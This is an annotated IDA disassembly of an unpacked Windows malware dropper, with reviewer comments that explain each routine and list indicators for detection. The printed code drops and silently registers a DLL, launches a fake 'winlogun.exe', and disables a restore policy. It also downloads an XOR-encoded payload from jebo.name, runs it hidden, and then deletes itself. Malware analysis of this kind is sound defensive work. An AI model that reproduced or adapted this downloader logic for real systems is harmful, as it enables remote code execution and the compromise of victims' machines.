;
; +-------------------------------------------------------------------------+
; |   This file is generated by The Interactive Disassembler (IDA)          |
; |   Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com>          |
; |   Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5   : 3FA17E2277CEAB3DD6E5AE9214ABC20F
; File Name   : u:\work\3fa17e2277ceab3dd6e5ae9214abc20f_unpacked.exe
; Format      : Portable executable for 80386 (PE)
; Imagebase   : 400000
; Section 1. (virtual address 00001000)
; Virtual size                  : 00006000 (  24576.)
; Section size in file          : 00006000 (  24576.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment     : default
;
; ---------------------------------------------------------------------------
; Analyst notes (added in review; derived only from what this listing shows)
;
;   Syntax / target : IDA MASM-style output, 32-bit x86 PE, flat model.
;   Calling style   : every "call sub_4016xx" below goes through an import
;                     thunk; the API name in the trailing comment is IDA's
;                     resolution of the IAT slot.  Win32 APIs are stdcall
;                     (arguments pushed right to left, callee pops);
;                     wsprintfA is cdecl, hence the "add esp, N" after it.
;   Quoted strings  : the text IDA prints after "push offset aXxx" is what
;                     the buffer held when the listing was produced.  Several
;                     of these (aCDocume1Cybert, aCM_unpackerPac,
;                     aCM_unpackerP2h, aCM_unpackerP_0, a1646169094_exe,
;                     a1c97ae360a5d87, aHttpJebo_nam_0) are used as output
;                     buffers by the code, so the quoted text is not a
;                     constant -- presumably residue of the unpacking run.
;
;   Host / network artifacts named in the code (useful for detection):
;     <system directory>\hsjefi8wunkmdf.dll   written, then "Regsvr32.exe /s"
;     <temp path>winlogun.exe                 written, then WinExec
;     <temp path><number>.exe                 two names built from "%lu.exe"
;     p2hhr.bat in the module's own directory written by sub_401127
;     registry value "Disable Config" (HKLM) and "WINID" (HKCU)
;     URL format "http://jebo.name/cd/un2.php?id=%s&ver=v"... (truncated here)
; ---------------------------------------------------------------------------

                .686p
                .mmx
                .model flat

; ===========================================================================

; Segment type: Pure code
; Segment permissions: Read/Execute
_text           segment para public 'CODE' use32
                assume cs:_text
                ;org 401000h
                assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing

; =============== S U B R O U T I N E =======================================

; start -- program entry point; drops two embedded files and launches them.
;
; Sequence, as far as the calls below show:
;   1. Build "<system directory>\hsjefi8wunkmdf.dll", write 3A98h bytes taken
;      from dword_403004 into it (that data begins 4Dh 5Ah "MZ" later in the
;      listing, i.e. an embedded PE image), then run
;      "Regsvr32.exe /s <path>" through WinExec.
;   2. Call sub_40150E and sub_401565 (registry writes).
;   3. Build "<temp path>winlogun.exe", write 3A98h bytes from dword_406A9C
;      (= dword_403004 + 3A98h, so the second blob directly follows the
;      first), then run it with WinExec(path, 0).
;   4. Pass the URL format string aHttpJebo_nameC to sub_4012DD.
;   5. WinExec("explorer.exe", 0), call sub_401127, ExitProcess(eax).
;
; None of the CreateFileA / WriteFile / WinExec results is checked here.
; "sp-analysis failed" on the endp line is IDA's own remark.

                public start
start           proc near
                ; The next three instructions have no visible consumer of
                ; their results -- presumably filler; confirm before relying
                ; on that.
                xor     dx, dx
                add     eax, ebp
                and     eax, esp

                ; GetSystemDirectoryA(lpBuffer = aCDocume1Cybert, uSize = 7FFh)
                push    7FFh
                push    offset aCDocume1Cybert ; "C:\\DOCUME~1\\cyberta\\LOCALS~1\\Temp\\winlo"...
                call    sub_401664      ; GetSystemDirectoryA

                ; Append the DLL file name to the system directory path.
                push    offset aHsjefi8wunkmdf ; "\\hsjefi8wunkmdf.dll"
                push    offset aCDocume1Cybert ; "C:\\DOCUME~1\\cyberta\\LOCALS~1\\Temp\\winlo"...
                call    sub_4016A6      ; lstrcatA

                ; CreateFileA(path, 40000000h = GENERIC_WRITE, share = 2,
                ;             NULL, 2 = CREATE_ALWAYS, 20h = FILE_ATTRIBUTE_ARCHIVE, NULL)
                push    0
                push    20h
                push    2
                push    0
                push    2
                push    40000000h
                push    offset aCDocume1Cybert ; "C:\\DOCUME~1\\cyberta\\LOCALS~1\\Temp\\winlo"...
                call    sub_40163A      ; CreateFileA
                mov     ds:dword_40A678, eax ; file handle kept in a global; not tested for failure

                ; WriteFile(handle, dword_403004, 3A98h, &dword_40AFA9, NULL)
                push    0
                push    offset dword_40AFA9
                push    3A98h           ; CODE XREF: .text:00406ED9j
                push    offset dword_403004
                push    ds:dword_40A678
                call    sub_4016A0      ; WriteFile
                push    ds:dword_40A678
                call    sub_401634      ; CloseHandle

                ; wsprintfA(aCM_unpackerPac, "Regsvr32.exe /s %s", <dll path>)
                push    offset aCDocume1Cybert ; "C:\\DOCUME~1\\cyberta\\LOCALS~1\\Temp\\winlo"...
                push    offset aRegsvr32_exeSS ; "Regsvr32.exe /s %s"
                push    offset aCM_unpackerPac ; "\"C:\\m_unpacker\\packed.exe\""
                call    sub_40162E      ; wsprintfA
                add     esp, 0Ch        ; cdecl cleanup: three arguments

                ; WinExec(command line, uCmdShow = 5)
                push    5
                push    offset aCM_unpackerPac ; "\"C:\\m_unpacker\\packed.exe\""
                call    sub_40169A      ; WinExec

                call    sub_40150E      ; HKLM policy value "Disable Config" = 1
                call    sub_401565      ; read or create the HKCU "WINID" value

                ; GetTempPathA(nBufferLength = 800h, lpBuffer = aCDocume1Cybert)
                push    offset aCDocume1Cybert ; "C:\\DOCUME~1\\cyberta\\LOCALS~1\\Temp\\winlo"...
                push    800h
                call    sub_401670      ; GetTempPathA
                push    offset aWinlogun_exe ; "winlogun.exe"
                push    offset aCDocume1Cybert ; "C:\\DOCUME~1\\cyberta\\LOCALS~1\\Temp\\winlo"...
                call    sub_4016A6      ; lstrcatA

                ; Same CreateFileA / WriteFile / CloseHandle pattern as above,
                ; this time for the second embedded blob.
                push    0
                push    20h
                push    2
                push    0
                push    2
                push    40000000h
                push    offset aCDocume1Cybert ; "C:\\DOCUME~1\\cyberta\\LOCALS~1\\Temp\\winlo"...
                call    sub_40163A      ; CreateFileA
                mov     ds:dword_40A678, eax
                push    0
                push    offset dword_40AFA9
                push    3A98h
                push    offset dword_406A9C
                push    ds:dword_40A678
                call    sub_4016A0      ; WriteFile
                push    ds:dword_40A678
                call    sub_401634      ; CloseHandle

                ; WinExec(<temp path>winlogun.exe, uCmdShow = 0)
                push    0
                push    offset aCDocume1Cybert ; "C:\\DOCUME~1\\cyberta\\LOCALS~1\\Temp\\winlo"...
                call    sub_40169A      ; WinExec

                ; sub_4012DD(URL format string): download, decode, execute.
                push    offset aHttpJebo_nameC ; "http://jebo.name/cd/un2.php?id=%s&ver=v"...
                call    sub_4012DD

                push    0
                push    offset aExplorer_exe ; "explorer.exe"
                call    sub_40169A      ; WinExec

                ; sub_401127 normally ends the process itself; it only
                ; returns when it cannot create its batch file.
                call    sub_401127
                push    eax
                call    sub_40164C      ; ExitProcess
start           endp ; sp-analysis failed


; =============== S U B R O U T I N E =======================================

; sub_401127 -- self-removal helper.
;
; Gets the module's own path, copies it to aCM_unpackerP_0, replaces the file
; name component with "p2hhr.bat", writes the batch text aLsh2Del1IfExis
; (":lsh2 / del %1 / if exist %1 goto lsh2 / ..." -- truncated in this
; listing) into that file, then launches the batch file with the quoted
; executable path as its parameter and calls ExitProcess(0).
;
; Returns (leave/retn) only when CreateFileA fails for the batch file.
; var_4 receives WriteFile's byte count and is otherwise unused.
; Attributes: bp-based frame

sub_401127      proc near               ; CODE XREF: start+11Cp

var_4           = byte ptr -4

                push    ebp
                mov     ebp, esp
                add     esp, 0FFFFFFFCh ; reserve 4 bytes of locals

                ; GetModuleFileNameA(NULL, aCM_unpackerP2h, 104h)
                push    104h
                push    offset aCM_unpackerP2h ; "C:\\m_unpacker\\p2hhr.bat"
                push    0
                call    sub_401658      ; GetModuleFileNameA

                ; lstrcpyA(dst = aCM_unpackerP_0, src = aCM_unpackerP2h):
                ; keep a copy of the full executable path.
                push    offset aCM_unpackerP2h ; "C:\\m_unpacker\\p2hhr.bat"
                push    offset aCM_unpackerP_0 ; "C:\\m_unpacker\\packed.exe"
                call    sub_4016AC      ; lstrcpyA

                ; Scan the path; edx ends up pointing at the last '\' (5Ch).
                ; NOTE(review): edx is not initialised to a valid pointer, so
                ; a path without any backslash would leave it undefined.
                lea     eax, aCM_unpackerP2h ; "C:\\m_unpacker\\p2hhr.bat"
                xor     dx, cx          ; no visible purpose -- presumably filler

loc_401156:                             ; CODE XREF: sub_401127+3Aj
                cmp     byte ptr [eax], 5Ch
                jnz     short loc_40115D
                mov     edx, eax

loc_40115D:                             ; CODE XREF: sub_401127+32j
                inc     eax
                cmp     byte ptr [eax], 0
                jnz     short loc_401156
                xor     ax, dx          ; result unused below -- presumably filler
                inc     edx
                mov     byte ptr [edx], 0 ; cut the string right after the last '\'

                push    offset aP2hhr_bat ; "p2hhr.bat"
                push    offset aCM_unpackerP2h ; "C:\\m_unpacker\\p2hhr.bat"
                call    sub_4016A6      ; lstrcatA

                ; CreateFileA(path, 0C0000000h = GENERIC_READ|GENERIC_WRITE,
                ;             share = 3, NULL, 2 = CREATE_ALWAYS, 0, NULL)
                push    0
                push    0
                push    2
                push    0
                push    3
                push    0C0000000h
                push    offset aCM_unpackerP2h ; "C:\\m_unpacker\\p2hhr.bat"
                call    sub_40163A      ; CreateFileA
                mov     ds:dword_40A678, eax
                inc     eax             ; 0FFFFFFFFh (INVALID_HANDLE_VALUE) + 1 = 0
                jz      short locret_401209

                ; WriteFile(handle, batch text, lstrlenA(batch text), &var_4, NULL)
                push    offset aLsh2Del1IfExis ; ":lsh2\r\ndel %1\r\nif exist %1 goto lsh2\r\nd"...
                call    sub_4016B2      ; lstrlenA
                mov     edx, eax
                push    0
                lea     eax, [ebp+var_4]
                push    eax
                push    edx
                push    offset aLsh2Del1IfExis ; ":lsh2\r\ndel %1\r\nif exist %1 goto lsh2\r\nd"...
                push    ds:dword_40A678
                call    sub_4016A0      ; WriteFile
                push    ds:dword_40A678
                call    sub_401634      ; CloseHandle
                xor     eax, ebp        ; eax is zeroed again below -- presumably filler
                jmp     short loc_4011D1
; ---------------------------------------------------------------------------
; Inline data skipped by the jmp above: bytes 22h 25h 73h 22h 00h, i.e. the
; format string "%s" wrapped in double quotes.
dword_4011CC    dd 22732522h
                db 0
; ---------------------------------------------------------------------------

loc_4011D1:                             ; CODE XREF: sub_401127+A3j
                ; wsprintfA(aCM_unpackerPac, dword_4011CC, aCM_unpackerP_0):
                ; build the quoted executable path.
                push    offset aCM_unpackerP_0 ; "C:\\m_unpacker\\packed.exe"
                push    offset dword_4011CC
                push    offset aCM_unpackerPac ; "\"C:\\m_unpacker\\packed.exe\""
                call    sub_40162E      ; wsprintfA
                add     esp, 0Ch

                ; Six-argument call: (0, "open", batch path, quoted exe path,
                ; 0, 0).  sub_4016E8 jumps through an IAT slot IDA did not
                ; name -- presumably ShellExecuteA; TODO confirm.
                xor     eax, eax
                push    0
                push    eax
                push    offset aCM_unpackerPac ; "\"C:\\m_unpacker\\packed.exe\""
                push    offset aCM_unpackerP2h ; "C:\\m_unpacker\\p2hhr.bat"
                push    offset aOpen    ; "open"
                push    eax
                call    sub_4016E8
                push    0
                call    sub_40164C      ; ExitProcess

locret_401209:                          ; CODE XREF: sub_401127+71j
                leave
                retn
sub_401127      endp


; =============== S U B R O U T I N E =======================================

; sub_40120B -- walks the WinINet URL cache and deletes each entry.
;
; For every step it first calls the Find* function with the static buffer
; byte_40C6BF and a size of 0 so that var_4 receives the required size, then
; allocates that many bytes (GlobalAlloc flags 42h), repeats the call into
; the new buffer and passes the dword at offset 4 of the returned record to
; DeleteUrlCacheEntryA.
;
;   var_4  = size in/out for the Find* calls
;   var_8  = GlobalAlloc handle
;   var_C  = GlobalLock pointer (entry buffer)
;   var_10 = enumeration handle from FindFirstUrlCacheEntryA
;
; NOTE(review): inside the loop var_10 is overwritten with the return value
; of FindNextUrlCacheEntryA, and GlobalUnlock is given the locked pointer
; (var_C) rather than the handle (var_8).  On the two exit paths the last
; allocation is not freed and no close call for the enumeration is visible.
; These look like defects in the sample -- confirm against the API contracts.
; Attributes: bp-based frame

sub_40120B      proc near               ; CODE XREF: sub_4012DD+9Dp

var_10          = dword ptr -10h
var_C           = dword ptr -0Ch
var_8           = dword ptr -8
var_4           = dword ptr -4

                push    ebp
                mov     ebp, esp
                add     esp, 0FFFFFFF0h ; reserve 10h bytes of locals

                ; Size probe: FindFirstUrlCacheEntryA(NULL, byte_40C6BF, &var_4) with var_4 = 0
                mov     [ebp+var_4], 0
                lea     eax, [ebp+var_4]
                push    eax
                push    offset byte_40C6BF
                push    0
                call    sub_4016D6      ; FindFirstUrlCacheEntryA

                ; GlobalAlloc(uFlags = 42h, dwBytes = var_4), then lock it
                push    [ebp+var_4]
                push    42h
                call    sub_401676      ; GlobalAlloc
                mov     [ebp+var_8], eax
                push    [ebp+var_8]
                call    sub_401682      ; GlobalLock
                mov     [ebp+var_C], eax

                ; Real call into the allocated buffer
                lea     eax, [ebp+var_4]
                push    eax
                push    [ebp+var_C]
                push    0
                call    sub_4016D6      ; FindFirstUrlCacheEntryA
                or      eax, eax
                jz      locret_4012DB   ; no entry / failure: leave
                mov     [ebp+var_10], eax ; enumeration handle

                mov     edx, [ebp+var_C]
                push    dword ptr [edx+4] ; pointer stored at offset 4 of the entry record
                call    sub_4016D0      ; DeleteUrlCacheEntryA
                push    [ebp+var_C]
                call    sub_401688      ; GlobalUnlock
                push    [ebp+var_8]
                call    sub_40167C      ; GlobalFree

loc_401274:                             ; CODE XREF: sub_40120B:loc_4012D9j
                ; Same probe / allocate / fetch / delete cycle for the next entry
                mov     [ebp+var_4], 0
                lea     eax, [ebp+var_4]
                push    eax
                push    offset byte_40C6BF
                push    [ebp+var_10]
                call    sub_4016DC      ; FindNextUrlCacheEntryA
                push    [ebp+var_4]
                push    42h
                call    sub_401676      ; GlobalAlloc
                mov     [ebp+var_8], eax
                push    [ebp+var_8]
                call    sub_401682      ; GlobalLock
                mov     [ebp+var_C], eax
                lea     eax, [ebp+var_4]
                push    eax
                push    [ebp+var_C]
                push    [ebp+var_10]
                call    sub_4016DC      ; FindNextUrlCacheEntryA
                or      eax, eax
                jz      short loc_4012D7 ; enumeration finished or failed
                mov     [ebp+var_10], eax ; NOTE(review): replaces the handle with the call's result
                mov     edx, [ebp+var_C]
                push    dword ptr [edx+4]
                call    sub_4016D0      ; DeleteUrlCacheEntryA
                push    [ebp+var_C]
                call    sub_401688      ; GlobalUnlock
                push    [ebp+var_8]
                call    sub_40167C      ; GlobalFree
                jmp     short loc_4012D9
; ---------------------------------------------------------------------------

loc_4012D7:                             ; CODE XREF: sub_40120B+AAj
                jmp     short locret_4012DB
; ---------------------------------------------------------------------------

loc_4012D9:                             ; CODE XREF: sub_40120B+CAj
                jmp     short loc_401274
; ---------------------------------------------------------------------------

locret_4012DB:                          ; CODE XREF: sub_40120B+45j
                                        ; sub_40120B:loc_4012D7j
                leave
                retn
sub_40120B      endp


; =============== S U B R O U T I N E =======================================

; sub_4012DD -- download a file, XOR-decode it, run it.
;
; In:    arg_0 = format string for the URL (the caller passes
;                aHttpJebo_nameC); formatted with the ID string
;                a1c97ae360a5d87 into aHttpJebo_nam_0.
; Out:   eax = 1 when the download call returns non-zero, otherwise the
;              return value of CreateProcessA.
; Stack: callee pops its single argument (retn 4).
;
; Locals:
;   var_85C  = path of the downloaded (encoded) file, "<temp path><n>.exe"
;   var_105C = path of the decoded file, a second "<temp path><n>.exe"
;   var_5C   = FILETIME; only its first dword is used as <n>
;   var_1064 / var_1068 = input / output file handles
;   var_106C = remaining byte count, var_106D = XOR key byte
;   var_44   = STARTUPINFO (44h bytes), var_54 = PROCESS_INFORMATION
;   var_1060 = return value
;
; Decoding: the first byte of the downloaded file is read into var_106D and
; every following byte is XORed with it before being written out, one byte
; per ReadFile/WriteFile pair.
; NOTE(review): the loop counter is the full file size although one byte was
; already consumed as the key, so the last iteration appears to read at end
; of file -- confirm the resulting trailing byte in the decoded output.
; The process is started even when one of the CreateFileA calls failed,
; because all failure labels fall through to loc_4014A7.
; Attributes: bp-based frame

sub_4012DD      proc near               ; CODE XREF: start+10Bp

var_106D        = byte ptr -106Dh
var_106C        = dword ptr -106Ch
var_1068        = dword ptr -1068h
var_1064        = dword ptr -1064h
var_1060        = dword ptr -1060h
var_105C        = byte ptr -105Ch
var_85C         = byte ptr -85Ch
var_5C          = dword ptr -5Ch
var_54          = byte ptr -54h
var_44          = dword ptr -44h
var_18          = dword ptr -18h
var_14          = word ptr -14h
arg_0           = dword ptr  8

                push    ebp
                mov     ebp, esp
                add     esp, 0FFFFEF90h ; reserve 1070h bytes of locals
                mov     [ebp+var_1060], 1 ; default return value

                ; First temp name: wsprintfA(name, "%lu.exe", low dword of current FILETIME)
                lea     eax, [ebp+var_5C]
                push    eax
                call    sub_40166A      ; GetSystemTimeAsFileTime
                push    [ebp+var_5C]
                push    offset aLu_exe  ; "%lu.exe"
                push    offset a1646169094_exe ; "1646169094.exe"
                call    sub_40162E      ; wsprintfA
                add     esp, 0Ch
                lea     eax, [ebp+var_85C]
                push    eax
                push    7D0h
                call    sub_401670      ; GetTempPathA
                push    offset a1646169094_exe ; "1646169094.exe"
                lea     eax, [ebp+var_85C]
                push    eax
                call    sub_4016A6      ; lstrcatA

                ; Sleep(3E8h) so that the second timestamp-based name differs
                push    3E8h
                call    sub_401694      ; Sleep

                ; Second temp name, built the same way into var_105C
                lea     eax, [ebp+var_5C]
                push    eax
                call    sub_40166A      ; GetSystemTimeAsFileTime
                push    [ebp+var_5C]
                push    offset aLu_exe  ; "%lu.exe"
                push    offset a1646169094_exe ; "1646169094.exe"
                call    sub_40162E      ; wsprintfA
                add     esp, 0Ch
                lea     eax, [ebp+var_105C]
                push    eax
                push    7D0h
                call    sub_401670      ; GetTempPathA
                push    offset a1646169094_exe ; "1646169094.exe"
                lea     eax, [ebp+var_105C]
                push    eax
                call    sub_4016A6      ; lstrcatA

                call    sub_40120B      ; delete the URL cache entries first

                ; wsprintfA(aHttpJebo_nam_0, arg_0, a1c97ae360a5d87): final URL
                push    offset a1c97ae360a5d87 ; "1C97AE360A5D87A"
                push    [ebp+arg_0]
                push    offset aHttpJebo_nam_0 ; "http://jebo.name/cd/un2.php?id=1C97AE36"...
                call    sub_40162E      ; wsprintfA
                add     esp, 0Ch

                ; Five-argument call: (0, URL, var_85C, 0, 0).  sub_4016E2
                ; jumps through an IAT slot IDA did not name -- presumably
                ; URLDownloadToFileA; TODO confirm.  Non-zero result = skip.
                push    0
                push    0
                lea     eax, [ebp+var_85C]
                push    eax
                push    offset aHttpJebo_nam_0 ; "http://jebo.name/cd/un2.php?id=1C97AE36"...
                push    0
                call    sub_4016E2
                or      eax, eax
                jnz     loc_4014F8

                ; Open the downloaded file: 80000000h = GENERIC_READ, 3 = OPEN_EXISTING
                push    0
                push    20h
                push    3
                push    0
                push    3
                push    80000000h
                lea     eax, [ebp+var_85C]
                push    eax
                call    sub_40163A      ; CreateFileA
                cmp     eax, 0FFFFFFFFh ; INVALID_HANDLE_VALUE
                jz      loc_4014A7
                mov     [ebp+var_1064], eax

                ; Create the output file: 40000000h = GENERIC_WRITE, 2 = CREATE_ALWAYS
                push    0
                push    20h
                push    2
                push    0
                push    3
                push    40000000h
                lea     eax, [ebp+var_105C]
                push    eax
                call    sub_40163A      ; CreateFileA
                cmp     eax, 0FFFFFFFFh
                jz      loc_40149C
                mov     [ebp+var_1068], eax

                push    0
                push    [ebp+var_1064]
                call    sub_401652      ; GetFileSize
                cmp     eax, 0FFFFFFFFh ; size query failed
                jz      short loc_401491
                or      eax, eax        ; empty file
                jz      short loc_401491
                mov     [ebp+var_106C], eax

                ; Read the first byte: it becomes the XOR key (var_106D)
                push    0
                push    offset dword_40AFA9
                push    1
                lea     eax, [ebp+var_106D]
                push    eax
                push    [ebp+var_1064]
                call    sub_40168E      ; ReadFile
                jmp     short loc_401488
; ---------------------------------------------------------------------------

loc_401440:                             ; CODE XREF: sub_4012DD+1B2j
                ; Read one byte, XOR it with the key, write it out
                push    0
                push    offset dword_40AFA9
                push    1
                push    offset byte_40A66F
                push    [ebp+var_1064]
                call    sub_40168E      ; ReadFile
                mov     al, ds:byte_40A66F
                xor     al, [ebp+var_106D]
                mov     ds:byte_40A66F, al
                push    0
                push    offset dword_40AFA9
                push    1
                push    offset byte_40A66F
                push    [ebp+var_1068]
                call    sub_4016A0      ; WriteFile
                dec     [ebp+var_106C]

loc_401488:                             ; CODE XREF: sub_4012DD+161j
                cmp     [ebp+var_106C], 0
                jnz     short loc_401440

loc_401491:                             ; CODE XREF: sub_4012DD+13Aj
                                        ; sub_4012DD+13Ej
                push    [ebp+var_1068]
                call    sub_401634      ; CloseHandle

loc_40149C:                             ; CODE XREF: sub_4012DD+11Ej
                push    [ebp+var_1064]
                call    sub_401634      ; CloseHandle

loc_4014A7:                             ; CODE XREF: sub_4012DD+F4j
                ; Remove the encoded download
                lea     eax, [ebp+var_85C]
                push    eax
                call    sub_401646      ; DeleteFileA

                ; STARTUPINFO: cb = 44h; after GetStartupInfoA, the dword at
                ; offset 2Ch (var_18, dwFlags) is set to 1 and the word at
                ; offset 30h (var_14, wShowWindow) to 0, i.e. a hidden window.
                mov     [ebp+var_44], 44h
                lea     eax, [ebp+var_44]
                push    eax
                call    sub_40165E      ; GetStartupInfoA
                mov     [ebp+var_18], 1
                mov     [ebp+var_14], 0

                ; CreateProcessA(NULL, var_105C, NULL, NULL, bInheritHandles = 1,
                ;                0, NULL, NULL, &var_44, &var_54)
                lea     eax, [ebp+var_54]
                push    eax
                lea     eax, [ebp+var_44]
                push    eax
                push    0
                push    0
                push    0
                push    1
                push    0
                push    0
                lea     eax, [ebp+var_105C]
                push    eax
                push    0
                call    sub_401640      ; CreateProcessA
                mov     [ebp+var_1060], eax

loc_4014F8:                             ; CODE XREF: sub_4012DD+D0j
                ; Attempt to delete the decoded file on every path
                lea     eax, [ebp+var_105C]
                push    eax
                call    sub_401646      ; DeleteFileA
                mov     eax, [ebp+var_1060]
                leave
                retn    4
sub_4012DD      endp


; =============== S U B R O U T I N E =======================================

; sub_40150E -- sets the DWORD value "Disable Config" to 1 under an HKLM
; policy key.
;
; RegCreateKeyExA(80000002h = HKEY_LOCAL_MACHINE, aSoftwarePolici, 0, NULL, 0,
;                 0F003Fh = KEY_ALL_ACCESS, NULL, &aA, &dword_40AFA9)
; The subkey string is truncated in this listing
; ("SOFTWARE\\Policies\\Microsoft\\Windows NT\\"...); presumably the System
; Restore policy key -- TODO confirm from the data segment.
; aA is used as the HKEY output variable (IDA shows it as an empty string);
; dword_40AFA9 is reused first as the disposition output, then as the data.
; No return code is checked.  No frame; no arguments.

sub_40150E      proc near               ; CODE XREF: start+8Dp
                push    offset dword_40AFA9
                push    offset aA       ; ""
                push    0
                push    0F003Fh
                push    0
                push    0
                push    0
                push    offset aSoftwarePolici ; "SOFTWARE\\Policies\\Microsoft\\Windows NT\\"...
                push    80000002h
                call    sub_4016BE      ; RegCreateKeyExA
                mov     ds:dword_40AFA9, 1 ; value data

                ; RegSetValueExA(hKey, "Disable Config", 0, 4 = REG_DWORD, &dword_40AFA9, 4)
                push    4
                push    offset dword_40AFA9
                push    4
                push    0
                push    offset aDisableConfig ; "Disable Config"
                push    dword ptr ds:aA ; ""
                call    sub_4016CA      ; RegSetValueExA
                push    dword ptr ds:aA ; ""
                call    sub_4016B8      ; RegCloseKey
                retn
sub_40150E      endp


; =============== S U B R O U T I N E =======================================

; sub_401565 -- loads or creates the per-user ID string "WINID".
;
; Opens/creates an HKCU key (80000001h; subkey string truncated here:
; "Software\\Microsoft\\Windows\\CurrentVersi"...), then queries the value
; "WINID" into the buffer a1c97ae360a5d87 (size 0FFh).  When the query
; fails, a new ID is formatted from the current FILETIME with "%lX%lX"
; (var_4 first, then var_8) and stored as a string value (type 1 = REG_SZ).
; Finally, when the ID is shorter than 0Ah characters it is replaced by the
; literal "ERROR".  The same buffer is later used by sub_4012DD as the
; "id" URL parameter.
; Attributes: bp-based frame

sub_401565      proc near               ; CODE XREF: start+92p

var_8           = dword ptr -8
var_4           = dword ptr -4

                push    ebp
                mov     ebp, esp
                add     esp, 0FFFFFFF8h ; 8 bytes: one FILETIME
                push    offset dword_40AFA9
                push    offset aA       ; ""
                push    0
                push    0F003Fh
                push    0
                push    0
                push    0
                push    offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
                push    80000001h
                call    sub_4016BE      ; RegCreateKeyExA
                mov     ds:dword_40AFA9, 0FFh ; in: buffer size for the query

                ; RegQueryValueExA(hKey, "WINID", NULL, NULL, id buffer, &dword_40AFA9)
                push    offset dword_40AFA9
                push    offset a1c97ae360a5d87 ; "1C97AE360A5D87A"
                push    0
                push    0
                push    offset aWinid   ; "WINID"
                push    dword ptr ds:aA ; ""
                call    sub_4016C4      ; RegQueryValueExA
                or      eax, eax
                jz      short loc_401602 ; 0 = value already present

                ; No stored ID: derive one from the current time
                lea     eax, [ebp+var_8]
                push    eax
                call    sub_40166A      ; GetSystemTimeAsFileTime
                push    [ebp+var_8]
                push    [ebp+var_4]
                push    offset aLxLx    ; "%lX%lX"
                push    offset a1c97ae360a5d87 ; "1C97AE360A5D87A"
                call    sub_40162E      ; wsprintfA
                add     esp, 10h        ; cdecl cleanup: four arguments

                ; RegSetValueExA(hKey, "WINID", 0, 1 = REG_SZ, id, lstrlenA(id))
                push    offset a1c97ae360a5d87 ; "1C97AE360A5D87A"
                call    sub_4016B2      ; lstrlenA
                push    eax
                push    offset a1c97ae360a5d87 ; "1C97AE360A5D87A"
                push    1
                push    0
                push    offset aWinid   ; "WINID"
                push    dword ptr ds:aA ; ""
                call    sub_4016CA      ; RegSetValueExA

loc_401602:                             ; CODE XREF: sub_401565+56j
                push    dword ptr ds:aA ; ""
                call    sub_4016B8      ; RegCloseKey

                ; Sanity check: an ID shorter than 0Ah characters becomes "ERROR"
                push    offset a1c97ae360a5d87 ; "1C97AE360A5D87A"
                call    sub_4016B2      ; lstrlenA
                cmp     eax, 0Ah
                jnb     short locret_40162B
                push    offset aError   ; "ERROR"
                push    offset a1c97ae360a5d87 ; "1C97AE360A5D87A"
                call    sub_4016AC      ; lstrcpyA

locret_40162B:                          ; CODE XREF: sub_401565+B5j
                leave
                retn
sub_401565      endp

; ---------------------------------------------------------------------------
                align 2

; Import thunks follow: each is a single indirect jmp through one IAT slot.

; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_40162E      proc near               ; CODE XREF: start+79p sub_401127+B9p ...
                jmp     dword_402080    ; IAT slot: USER32.wsprintfA
sub_40162E      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_401634      proc near               ; CODE XREF: start+65p start+F5p ...
                jmp     dword_402060    ; IAT slot: KERNEL32.CloseHandle
sub_401634      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_40163A      proc near               ; CODE XREF: start+39p start+C9p ...
; (body of thunk sub_40163A, whose "proc near" line is the line above)
; Every routine in this run is an import thunk: one indirect jmp through an
; IAT slot.  The API named on each jmp is the one IDA lists for that slot in
; the import address table further down the listing.
                jmp     dword_40204C    ; IAT slot: KERNEL32.CreateFileA
sub_40163A      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_401640      proc near               ; CODE XREF: sub_4012DD+210p
                jmp     dword_402034    ; IAT slot: KERNEL32.CreateProcessA
sub_401640      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_401646      proc near               ; CODE XREF: sub_4012DD+1D1p
                                        ; sub_4012DD+222p
                jmp     dword_402014    ; IAT slot: KERNEL32.DeleteFileA
sub_401646      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_40164C      proc near               ; CODE XREF: start+122p sub_401127+DDp
                jmp     dword_402018    ; IAT slot: KERNEL32.ExitProcess
sub_40164C      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_401652      proc near               ; CODE XREF: sub_4012DD+132p
                jmp     dword_40201C    ; IAT slot: KERNEL32.GetFileSize
sub_401652      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_401658      proc near               ; CODE XREF: sub_401127+12p
                jmp     dword_402020    ; IAT slot: KERNEL32.GetModuleFileNameA
sub_401658      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_40165E      proc near               ; CODE XREF: sub_4012DD+1E1p
                jmp     dword_402024    ; IAT slot: KERNEL32.GetStartupInfoA
sub_40165E      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_401664      proc near               ; CODE XREF: start+11p
                jmp     dword_402028    ; IAT slot: KERNEL32.GetSystemDirectoryA
sub_401664      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_40166A      proc near               ; CODE XREF: sub_4012DD+17p
                                        ; sub_4012DD+61p ...
                jmp     dword_40202C    ; IAT slot: KERNEL32.GetSystemTimeAsFileTime
sub_40166A      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_401670      proc near               ; CODE XREF: start+A1p sub_4012DD+3Dp ...
                jmp     dword_402030    ; IAT slot: KERNEL32.GetTempPathA
sub_401670      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_401676      proc near               ; CODE XREF: sub_40120B+22p
                                        ; sub_40120B+86p
                jmp     dword_402064    ; IAT slot: KERNEL32.GlobalAlloc
sub_401676      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

sub_40167C      proc near               ; CODE XREF: sub_40120B+64p
                                        ; sub_40120B+C5p
                jmp     dword_402038    ; IAT slot: KERNEL32.GlobalFree
sub_40167C      endp


; =============== S U B R O U T I N E =======================================

; Attributes: thunk

